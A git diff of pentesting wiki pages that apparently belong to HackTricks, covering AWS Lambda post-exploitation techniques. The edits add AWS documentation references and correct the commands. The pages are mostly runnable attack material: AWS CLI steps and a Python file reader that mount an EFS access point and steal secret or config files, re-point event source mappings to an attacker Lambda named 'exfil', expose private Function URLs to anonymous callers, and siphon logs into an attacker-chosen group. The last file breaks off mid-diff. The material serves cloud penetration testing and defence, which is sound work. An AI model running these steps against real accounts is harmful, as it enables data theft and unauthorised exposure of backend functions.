-Abuse `lambda:UpdateFunctionConfiguration` advanced logging controls to redirect a function’s logs to an attacker-chosen CloudWatch Logs log group. This works without changing code or the execution role (most Lambda roles already include `logs:CreateLogGroup/CreateLogStream/PutLogEvents` via `AWSLambdaBasicExecutionRole`). If the function prints secrets/request bodies or crashes with stack traces, you can collect them from the new log group.
+Abuse `lambda:UpdateFunctionConfiguration` advanced logging controls to redirect a function's logs to an attacker-chosen CloudWatch Logs log group.<sup>[[10]](#references)[[11]](#references)</sup> No code change is required, but the execution role must be able to deliver logs; `AWSLambdaBasicExecutionRole` grants `logs:CreateLogGroup`, `logs:CreateLogStream`, and `logs:PutLogEvents`.<sup>[[2]](#references)</sup> If the function prints secrets or request bodies, or emits stack traces, the redirected group can collect them.
 
 {{#ref}}
 aws-lambda-loggingconfig-redirection.md
@@ -66,7 +64,7 @@ aws-lambda-loggingconfig-redirection.md
 
 ### AWS - Lambda Function URL Public Exposure
 
-Turn a private Lambda Function URL into a public unauthenticated endpoint by switching the Function URL AuthType to NONE and attaching a resource-based policy that grants lambda:InvokeFunctionUrl to everyone. This enables anonymous invocation of internal functions and can expose sensitive backend operations.
+Turn a private Lambda Function URL into a public unauthenticated endpoint by switching its `AuthType` to `NONE` and attaching a resource-based policy for a public principal. AWS documents that new URLs require both `lambda:InvokeFunctionUrl` and `lambda:InvokeFunction`; granting those permissions to everyone enables anonymous invocation of internal functions and can expose sensitive backend operations.<sup>[[12]](#references)</sup>
 
 {{#ref}}
 aws-lambda-function-url-public-exposure.md
@@ -74,7 +72,7 @@ aws-lambda-function-url-public-exposure.md
 
 ### AWS Lambda – Event Source Mapping Target Hijack
 
-Abuse `UpdateEventSourceMapping` to change the target Lambda function of an existing Event Source Mapping (ESM) so that records from DynamoDB Streams, Kinesis, or SQS are delivered to an attacker-controlled function. This silently diverts live data without touching producers or the original function code.
+Abuse `UpdateEventSourceMapping` to change the target Lambda function of an existing Event Source Mapping (ESM), causing records from DynamoDB Streams, Kinesis, or SQS to be delivered to an attacker-controlled function. This can divert live data without touching producers or the original function code.<sup>[[13]](#references)</sup>
 
 {{#ref}}
 aws-lambda-event-source-mapping-hijack.md
@@ -82,16 +80,28 @@ aws-lambda-event-source-mapping-hijack.md
 
 ### AWS Lambda – EFS Mount Injection data exfiltration
 
-Abuse `lambda:UpdateFunctionConfiguration` to attach an existing EFS Access Point to a Lambda, then deploy trivial code that lists/reads files from the mounted path to exfiltrate shared secrets/config that the function previously couldn’t access.
+Abuse `lambda:UpdateFunctionConfiguration` to attach an existing EFS access point to a Lambda, then deploy trivial code that lists or reads files from the mounted path. This creates an exfiltration path for shared secrets or configuration that the function could not previously access.<sup>[[14]](#references)[[15]](#references)</sup>
 
 {{#ref}}
 aws-lambda-efs-mount-injection.md
 {{#endref}}
 
+## References
 
+- [1] [Working with Lambda environment variables - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-envvars.html)
+- [2] [AWSLambdaBasicExecutionRole - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSLambdaBasicExecutionRole.html)
+- [3] [Actions, resources, and condition keys for AWS Lambda](https://docs.aws.amazon.com/service-authorization/latest/reference/list_lambda.html)
+- [4] [DeleteFunction - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_DeleteFunction.html)
+- [5] [Gaining Persistency on Vulnerable Lambdas](https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/)
+- [6] [Using the Lambda Extensions API to create extensions - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html)
+- [7] [LambdaSpy](https://github.com/clearvector/lambda-spy)
+- [8] [Giving Lambda functions access to resources in an Amazon VPC - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-vpc.html)
+- [9] [PutRuntimeManagementConfig - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_PutRuntimeManagementConfig.html)
+- [10] [Configuring CloudWatch log groups - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/monitoring-cloudwatchlogs-loggroups.html)
+- [11] [LoggingConfig - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_LoggingConfig.html)
+- [12] [Control access to Lambda function URLs - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/urls-auth.html)
+- [13] [UpdateEventSourceMapping - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateEventSourceMapping.html)
+- [14] [FileSystemConfig - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_FileSystemConfig.html)
+- [15] [Configuring Amazon EFS file system access - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-filesystem-efs.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md
@@ -1,8 +1,6 @@
 # AWS Lambda – EFS Mount Injection via UpdateFunctionConfiguration (Data Theft)
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-Abuse `lambda:UpdateFunctionConfiguration` to attach an existing EFS Access Point to a Lambda, then deploy trivial code that lists/reads files from the mounted path to exfiltrate shared secrets/config that the function previously couldn’t access.
+Abuse `lambda:UpdateFunctionConfiguration` to attach an existing EFS Access Point to a Lambda, then deploy trivial code that lists/reads files from the mounted path to exfiltrate shared secrets/config that the function previously couldn’t access. Lambda exposes an EFS access point through a local path under `/mnt/` and requires the file system to be reachable from the function's VPC.<sup>[[1]](#references)</sup>
 
 ## Requirements
 - Permissions on the victim account/principal:
@@ -11,60 +9,91 @@ Abuse `lambda:UpdateFunctionConfiguration` to attach an existing EFS Access Poin
   - `lambda:UpdateFunctionConfiguration`
   - `lambda:UpdateFunctionCode`
   - `lambda:InvokeFunction`
-  - `efs:DescribeMountTargets` (to confirm mount targets exist)
+  - `elasticfilesystem:DescribeMountTargets` (to confirm mount targets exist)<sup>[[1]](#references)</sup>
 - Environment assumptions:
-  - Target Lambda is VPC-enabled and its subnets/SGs can reach the EFS mount target SG over TCP/2049 (e.g. role has AWSLambdaVPCAccessExecutionRole and VPC routing allows it).
-  - The EFS Access Point is in the same VPC and has mount targets in the AZs of the Lambda subnets.
+  - Target Lambda is VPC-enabled and its subnets/SGs can reach the EFS mount target SG over TCP/2049. Its execution role must allow `elasticfilesystem:ClientMount`; `elasticfilesystem:ClientWrite` is not needed for this read-only example. `AWSLambdaVPCAccessExecutionRole` covers the VPC network-interface permissions, not the EFS client permission.<sup>[[1]](#references)[[5]](#references)</sup>
+  - The EFS file system behind the access point is in the same VPC and has a mount target in every Availability Zone used by the Lambda subnets.<sup>[[1]](#references)</sup>
+  - The target uses a Python Zip deployment package and an unpublished `$LATEST` version; adapt the reader for other runtimes.
 
 ## Attack
 - Variables
 ```
 REGION=us-east-1
-TARGET_FN=<target-lambda-name>
-EFS_AP_ARN=<efs-access-point-arn>
+TARGET_FN="<target-lambda-name>"
+EFS_AP_ARN="<efs-access-point-arn>"
+
+wait_for_update() {
+    while :; do
+        status=$(aws lambda get-function-configuration \
+            --function-name "$TARGET_FN" \
+            --query LastUpdateStatus \
+            --output text \
+            --region "$REGION")
+        case "$status" in
+            Successful) return 0 ;;
+            Failed) echo "Lambda update failed" >&2; return 1 ;;
+            InProgress) sleep 2 ;;
+            *) echo "Unexpected Lambda update status: $status" >&2; return 1 ;;
+        esac
+    done
+}
 ```
+
+Run the Variables block first; it defines the status waiter used below.
 
 1) Attach the EFS Access Point to the Lambda
+
+The CLI accepts one EFS access-point ARN and a local mount path beginning with `/mnt/`; Lambda supports at most one file-system configuration per function.<sup>[[2]](#references)</sup>
+
 ```
 aws lambda update-function-configuration \
-  --function-name $TARGET_FN \
-  --file-system-configs Arn=$EFS_AP_ARN,LocalMountPath=/mnt/ht \
-  --region $REGION
-# wait until LastUpdateStatus == Successful
-until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+  --function-name "$TARGET_FN" \
+  --file-system-configs "Arn=$EFS_AP_ARN,LocalMountPath=/mnt/ht" \
+  --region "$REGION"
+wait_for_update
 ```
+
+`LastUpdateStatus` is `InProgress`, `Successful`, or `Failed`; wait for a successful update before making the next change or invoking the function.<sup>[[3]](#references)</sup>
 
 2) Overwrite code with a simple reader that lists files and peeks first 200 bytes of a candidate secret/config file
+
+`--zip-file` requires a Zip-based function, and Lambda does not allow code updates to a published version. Code-signing policies may also require the replacement package to be signed.<sup>[[4]](#references)</sup>
+
 ```
-cat > reader.py <<PY
-import os, json
-BASE=/mnt/ht
+cat > reader.py <<'PY'
+import os
+
+BASE = "/mnt/ht"
 
 def lambda_handler(e, c):
-    out={ls:[],peek:None}
+    out = {"ls": [], "peek": None}
     try:
         for root, dirs, files in os.walk(BASE):
             for f in files:
-                p=os.path.join(root,f)
-                out[ls].append(p)
-        cand = next((p for p in out[ls] if secret in p.lower() or config in p.lower()), None)
+                p = os.path.join(root, f)
+                out["ls"].append(p)
+        cand = next((p for p in out["ls"] if "secret" in p.lower() or "config" in p.lower()), None)
         if cand:
-            with open(cand,rb) as fh:
-                out[peek] = fh.read(200).decode(utf-8,ignore)
+            with open(cand, "rb") as fh:
+                out["peek"] = fh.read(200).decode("utf-8", "ignore")
     except Exception as ex:
-        out[err]=str(ex)
+        out["err"] = str(ex)
     return out
 PY
 zip reader.zip reader.py
-aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://reader.zip --region $REGION
+aws lambda update-function-code --function-name "$TARGET_FN" --zip-file fileb://reader.zip --region "$REGION"
+wait_for_update
 # If the original handler was different, set it to reader.lambda_handler
-aws lambda update-function-configuration --function-name $TARGET_FN --handler reader.lambda_handler --region $REGION
-until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+aws lambda update-function-configuration --function-name "$TARGET_FN" --handler reader.lambda_handler --region "$REGION"
+wait_for_update
 ```
 
 3) Invoke and get the data
+
+The AWS CLI invokes synchronously by default and writes the function response to the required output file; this operation requires `lambda:InvokeFunction`.<sup>[[6]](#references)</sup>
+
 ```
-aws lambda invoke --function-name $TARGET_FN /tmp/efs-out.json --region $REGION >/dev/null
+aws lambda invoke --function-name "$TARGET_FN" /tmp/efs-out.json --region "$REGION" >/dev/null
 cat /tmp/efs-out.json
 ```
 
@@ -75,6 +104,18 @@ An attacker with the listed permissions can mount arbitrary in-VPC EFS Access Po
 
 ## Cleanup
 ```
-aws lambda update-function-configuration --function-name $TARGET_FN --file-system-configs [] --region $REGION || true
+aws lambda update-function-configuration --function-name "$TARGET_FN" --file-system-configs '[]' --region "$REGION" || true
 ```
+
+This detaches EFS only; restore the original function code and handler separately.
+
+## References
+
+- [1] [AWS Lambda: Configuring Amazon EFS file system access](https://docs.aws.amazon.com/lambda/latest/dg/configuration-filesystem-efs.html)
+- [2] [AWS CLI: update-function-configuration](https://docs.aws.amazon.com/cli/latest/reference/lambda/update-function-configuration.html)
+- [3] [AWS Lambda API: UpdateFunctionConfiguration](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionConfiguration.html)
+- [4] [AWS Lambda API: UpdateFunctionCode](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionCode.html)
+- [5] [AWS Lambda: Giving Lambda functions access to resources in an Amazon VPC](https://docs.aws.amazon.com/lambda/latest/dg/configuration-vpc.html)
+- [6] [AWS CLI: invoke](https://docs.aws.amazon.com/cli/latest/reference/lambda/invoke.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md
@@ -1,22 +1,21 @@
 # AWS - Hijack Event Source Mapping to Redirect Stream/SQS/Kinesis to Attacker Lambda
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-Abuse `UpdateEventSourceMapping` to change the target Lambda function of an existing Event Source Mapping (ESM) so that records from DynamoDB Streams, Kinesis, or SQS are delivered to an attacker-controlled function. This silently diverts live data without touching producers or the original function code.
+Abuse `UpdateEventSourceMapping` to change the target Lambda function of an existing Event Source Mapping (ESM) so that records from DynamoDB Streams, Kinesis, or SQS are delivered to an attacker-controlled function. This silently diverts live data without touching producers or the original function code.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Impact
-- Divert and read live records from existing streams/queues without modifying producer apps or victim code.
+- Divert and read live records from existing streams/queues without modifying producer apps or victim code.<sup>[[1]](#references)[[2]](#references)</sup>
 - Potential data exfiltration or logic tampering by processing the victim's traffic in a rogue function.
 
 ## Required permissions
-- `lambda:ListEventSourceMappings`
-- `lambda:GetEventSourceMapping`
-- `lambda:UpdateEventSourceMapping`
-- Ability to deploy or reference an attacker-controlled Lambda (`lambda:CreateFunction` or permission to use an existing one).
+- `lambda:ListEventSourceMappings`<sup>[[3]](#references)</sup>
+- `lambda:GetEventSourceMapping`<sup>[[3]](#references)</sup>
+- `lambda:UpdateEventSourceMapping`<sup>[[3]](#references)</sup>
+- Ability to deploy or reference an attacker-controlled Lambda (`lambda:CreateFunction` plus `iam:PassRole` when creating one, or permission to use an existing one).<sup>[[3]](#references)</sup>
 
 ## Steps
 
 1) Enumerate event source mappings for the victim function
+The list operation can filter by function and returns each mapping's UUID and event source ARN.<sup>[[4]](#references)</sup>
 ```
 TARGET_FN=<victim-function-name>
 aws lambda list-event-source-mappings --function-name $TARGET_FN \
@@ -28,6 +27,7 @@ export EVENT_SOURCE_ARN=$(aws lambda list-event-source-mappings --function-name 
 ```
 
 2) Prepare an attacker-controlled receiver Lambda (same region; ideally similar VPC/runtime)
+For SQS, AWS requires the queue and Lambda function to be in the same Region.<sup>[[5]](#references)</sup>
 ```
 cat > exfil.py <<'PY'
 import json, boto3, os, time
@@ -41,7 +41,7 @@ def lambda_handler(event, context):
     return {'ok': True}
 PY
 zip exfil.zip exfil.py
-ATTACKER_LAMBDA_ROLE_ARN=<role-with-logs-(and optional S3)-permissions>
+ATTACKER_LAMBDA_ROLE_ARN=<role-with-logs-and-source-read-(and optional S3)-permissions>
 export ATTACKER_FN_ARN=$(aws lambda create-function \
   --function-name ht-esm-exfil \
   --runtime python3.11 --role $ATTACKER_LAMBDA_ROLE_ARN \
@@ -50,22 +50,26 @@ export ATTACKER_FN_ARN=$(aws lambda create-function \
 ```
 
 3) Re-point the mapping to the attacker function
+The mapping UUID identifies the resource, while `FunctionName` accepts the replacement function name or ARN.<sup>[[2]](#references)</sup>
 ```
 aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $ATTACKER_FN_ARN
 ```
 
 4) Generate an event on the source so the mapping fires (example: SQS)
+For SQS, Lambda polls the queue and invokes the mapped function with batches of messages, making a test message a simple trigger check.<sup>[[5]](#references)[[6]](#references)</sup>
 ```
 SOURCE_SQS_URL=<queue-url>
 aws sqs send-message --queue-url $SOURCE_SQS_URL --message-body '{"x":1}'
 ```
 
 5) Verify the attacker function receives the batch
+The AWS SQS walkthrough verifies this flow by monitoring the function's CloudWatch Logs after sending a message.<sup>[[6]](#references)</sup>
 ```
 aws logs filter-log-events --log-group-name /aws/lambda/ht-esm-exfil --limit 5
 ```
 
 6) Optional stealth
+Setting `Enabled` to false pauses polling and invocation; re-enabling the mapping resumes it from the same location.<sup>[[2]](#references)</sup>
 ```
 # Pause mapping while siphoning events
 aws lambda update-event-source-mapping --uuid $MAP_UUID --enabled false
@@ -75,7 +79,17 @@ aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $TARGET_
 ```
 
 Notes:
-- For SQS ESMs, the execution role of the Lambda processing the queue needs `sqs:ReceiveMessage`, `sqs:DeleteMessage`, and `sqs:GetQueueAttributes` (managed policy: `AWSLambdaSQSQueueExecutionRole`).
-- The ESM UUID remains the same; only its `FunctionArn` is changed, so producers and source ARNs are untouched.
+- For SQS ESMs, the execution role of the Lambda processing the queue needs `sqs:ReceiveMessage`, `sqs:DeleteMessage`, and `sqs:GetQueueAttributes` (managed policy: `AWSLambdaSQSQueueExecutionRole`).<sup>[[7]](#references)</sup>
+- The ESM UUID remains the same; only its `FunctionArn` is changed, so producers and source ARNs are untouched.<sup>[[2]](#references)</sup>
+
+## References
+
+- [1] [How Lambda processes records from stream and queue-based event sources - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/invocation-eventsourcemapping.html)
+- [2] [UpdateEventSourceMapping - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateEventSourceMapping.html)
+- [3] [Actions, resources, and condition keys for AWS Lambda](https://docs.aws.amazon.com/service-authorization/latest/reference/list_lambda.html)
+- [4] [ListEventSourceMappings - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_ListEventSourceMappings.html)
+- [5] [Creating and configuring an Amazon SQS event source mapping - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/services-sqs-configure.html)
+- [6] [Tutorial: Using Lambda with Amazon SQS](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-example.html)
+- [7] [AWSLambdaSQSQueueExecutionRole - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSLambdaSQSQueueExecutionRole.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md
@@ -1,38 +1,39 @@
 # AWS - Lambda Function URL Public Exposure (AuthType NONE + Public Invoke Policy)
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-Turn a private Lambda Function URL into a public unauthenticated endpoint by switching the Function URL AuthType to NONE and attaching a resource-based policy that grants lambda:InvokeFunctionUrl to everyone. This enables anonymous invocation of internal functions and can expose sensitive backend operations.
+Turn a private Lambda Function URL into a public unauthenticated endpoint by switching its `AuthType` to `NONE` and attaching a resource-based policy that grants URL invocation to everyone. With the required public policy statements in place, anyone who knows the URL can invoke the function without IAM authentication, potentially exposing sensitive backend operations when the function fronts internal logic.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Abusing it
 
-- Pre-reqs: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
+- Pre-reqs: `lambda:UpdateFunctionUrlConfig`, `lambda:CreateFunctionUrlConfig`, `lambda:AddPermission`, `lambda:GetFunctionUrlConfig`, and `lambda:RemovePermission`<sup>[[1]](#references)[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 - Region: us-east-1
 
+> **Warning:** Since October 2025, new function URLs require both `lambda:InvokeFunctionUrl` and `lambda:InvokeFunction` resource-policy statements. Omitting the second statement can cause a `403 Forbidden` response even when `AuthType` is `NONE`.<sup>[[1]](#references)</sup>
+
 ### Steps
-1) Ensure the function has a Function URL (defaults to AWS_IAM):
+1) Ensure the function has a Function URL configured for `AWS_IAM`:
     ```
     aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
     ```
 
-2) Switch the URL to public (AuthType NONE):
+2) Switch the URL to public (`AuthType NONE`):<sup>[[1]](#references)[[4]](#references)</sup>
     ```
     aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE
     ```
 
-3) Add a resource-based policy statement to allow unauthenticated principals:
+3) Add separate resource-based policy statements for URL invocation and function invocation. Restrict the second statement to calls made through the function URL:<sup>[[1]](#references)[[3]](#references)</sup>
     ```
     aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE
+    aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-invoke --action lambda:InvokeFunction --principal "*" --invoked-via-function-url
     ```
 
-4) Retrieve the URL and invoke without credentials:
+4) Retrieve the generated URL and invoke it without credentials. Function URLs are public-Internet HTTP(S) endpoints, and `get-function-url-config` returns the endpoint in `FunctionUrl`:<sup>[[2]](#references)[[5]](#references)</sup>
     ```
     URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
     curl -sS "$URL"
     ```
 
 ### Impact
-- The Lambda function becomes anonymously accessible over the internet.
+- The Lambda function becomes anonymously accessible through its public-Internet Function URL; anyone who knows the URL can invoke it when the wildcard policy statements match.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Example output (unauthenticated 200)
 
@@ -44,8 +45,21 @@ https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
 
 ### Cleanup
 
+Remove both resource-policy statements, then restore IAM authentication on the URL:<sup>[[1]](#references)[[4]](#references)[[6]](#references)</sup>
+
 ```
+aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-invoke || true
 aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
 aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
 ```
+
+## References
+
+- [1] [Control access to Lambda function URLs — AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/urls-auth.html)
+- [2] [Creating and managing Lambda function URLs — AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/urls-configuration.html)
+- [3] [add-permission — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/add-permission.html)
+- [4] [update-function-url-config — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/update-function-url-config.html)
+- [5] [get-function-url-config — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/get-function-url-config.html)
+- [6] [remove-permission — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/remove-permission.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md
@@ -1,56 +1,82 @@
 # AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-Abuse `lambda:UpdateFunctionConfiguration` advanced logging controls to redirect a function’s logs to an attacker-chosen CloudWatch Logs log group. This works without changing code or the execution role (most Lambda roles already include `logs:CreateLogGroup/CreateLogStream/PutLogEvents` via `AWSLambdaBasicExecutionRole`). If the function prints secrets/request bodies or crashes with stack traces, you can collect them from the new log group.
+Abuse `lambda:UpdateFunctionConfiguration`'s `LoggingConfig.LogGroup` setting to redirect a function's subsequent application and system logs to a chosen CloudWatch Logs log group. Lambda normally writes to `/aws/lambda/<function>`, but `LogGroup` accepts an existing or new custom group.<sup>[[1]](#references)[[2]](#references)</sup> This is a configuration-only change and does not require a code deployment.<sup>[[2]](#references)</sup> When the CLI sets a custom group, the function execution role still needs `logs:PutLogEvents`; the AWS managed `AWSLambdaBasicExecutionRole` policy grants that plus `logs:CreateLogGroup` and `logs:CreateLogStream`.<sup>[[1]](#references)[[3]](#references)</sup> If the function prints secrets/request bodies or crashes with stack traces, those messages can be collected from the sink when the reader can read the group.<sup>[[4]](#references)</sup>
 
 ## Required permissions
-- lambda:UpdateFunctionConfiguration
-- lambda:GetFunctionConfiguration
-- lambda:InvokeFunction (or rely on existing triggers)
-- logs:CreateLogGroup (often not required if the function role has it)
-- logs:FilterLogEvents (to read events)
+- `lambda:UpdateFunctionConfiguration` to set `LoggingConfig`.<sup>[[2]](#references)</sup>
+- `lambda:GetFunctionConfiguration` to poll `LastUpdateStatus`.<sup>[[5]](#references)</sup>
+- `lambda:InvokeFunction` to generate a test invocation, or an existing trigger that invokes the function.<sup>[[6]](#references)</sup>
+- `logs:CreateLogGroup` for the principal creating a new sink group in step 1.<sup>[[4]](#references)</sup>
+- The function execution role needs `logs:CreateLogStream` and `logs:PutLogEvents` for a new stream; it may also need `logs:CreateLogGroup` when Lambda must create the group. `AWSLambdaBasicExecutionRole` includes all three actions.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
+- `logs:FilterLogEvents` to read events from the sink.<sup>[[4]](#references)</sup>
 
 ## Steps
 1) Create a sink log group
+
+Create the group in the target function's Region. Lambda supports existing or new custom groups, whose names must follow CloudWatch Logs naming rules and must not begin with `aws/`.<sup>[[1]](#references)</sup>
 
 ```
 aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
 ```
 
 2) Redirect the target function logs
+
+For supported runtimes, application and system log-level filtering uses JSON log format; `TRACE` is the most detailed application level and `DEBUG` is the most detailed system level.<sup>[[8]](#references)[[9]](#references)</sup>
+
 ```
 aws lambda update-function-configuration \
   --function-name <TARGET_FN> \
-  --logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
+  --logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=TRACE,SystemLogLevel=DEBUG \
   --region us-east-1
 ```
-Wait until `LastUpdateStatus` becomes `Successful`:
+
+The update is asynchronous. Repeat the check until `LastUpdateStatus` becomes `Successful`, and stop if it becomes `Failed`:<sup>[[5]](#references)</sup>
+
 ```
 aws lambda get-function-configuration --function-name <TARGET_FN> \
   --query LastUpdateStatus --output text
 ```
 
 3) Invoke and read from the sink
+
+The AWS CLI v2 requires `--cli-binary-format raw-in-base64-out` when an inline JSON payload is passed to `lambda invoke`.<sup>[[7]](#references)</sup>
+
 ```
-aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
+aws lambda invoke --function-name <TARGET_FN> \
+  --cli-binary-format raw-in-base64-out \
+  --payload '{"ht":"log"}' \
+  /tmp/out.json --region us-east-1 >/dev/null
 sleep 5
 aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
 ```
 
 ## Impact
-- Covertly redirect all application/system logs to a log group you control, bypassing expectations that logs only land in `/aws/lambda/<fn>`.
-- Exfiltrate sensitive data printed by the function or surfaced in errors.
+- Covertly redirect application and system logs that pass the configured log-level filters to a log group you control, bypassing expectations that logs only land in `/aws/lambda/<fn>`.<sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
+- Exfiltrate sensitive data printed by the function or surfaced in errors; reading those events requires CloudWatch Logs read permission.<sup>[[4]](#references)</sup>
 
 ## Cleanup
+Record the original logging settings before changing them. The following example returns to the conventional group and text/INFO settings; use the original values when they are known.<sup>[[1]](#references)[[8]](#references)[[9]](#references)</sup>
+
 ```
 aws lambda update-function-configuration --function-name <TARGET_FN> \
-  --logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
+  --logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO,SystemLogLevel=INFO \
   --region us-east-1 || true
 ```
 
 ## Notes
-- Logging controls are part of Lambda’s `LoggingConfig` (LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel).
-- By default, Lambda sends logs to `/aws/lambda/<function>`, but you can point to any log group name; Lambda (or the execution role) will create it if allowed.
+- Logging controls are part of Lambda's `LoggingConfig` (`LogGroup`, `LogFormat`, `ApplicationLogLevel`, and `SystemLogLevel`).<sup>[[2]](#references)</sup>
+- By default, Lambda sends logs to `/aws/lambda/<function>`, but you can point to an existing or new custom log group; when using the CLI, ensure the execution role has `logs:PutLogEvents`.<sup>[[1]](#references)[[2]](#references)</sup>
+
+## References
+
+- [1] [Configuring CloudWatch log groups - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/monitoring-cloudwatchlogs-loggroups.html)
+- [2] [update-function-configuration - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/update-function-configuration.html)
+- [3] [AWSLambdaBasicExecutionRole - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSLambdaBasicExecutionRole.html)
+- [4] [CloudWatch Logs permissions reference - Amazon CloudWatch Logs](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/permissions-reference-cwl.html)
+- [5] [GetFunctionConfiguration - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_GetFunctionConfiguration.html)
+- [6] [Invoke - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_Invoke.html)
+- [7] [invoke - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lambda/invoke.html)
+- [8] [Log-level filtering - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/monitoring-cloudwatchlogs-log-level.html)
+- [9] [Configuring JSON and plain text log formats - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/monitoring-cloudwatchlogs-logformat.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md
@@ -1,16 +1,28 @@
 # AWS Lambda – Runtime Pinning/Rollback Abuse via PutRuntimeManagementConfig
 
-{{#include ../../../../banners/hacktricks-training.md}}
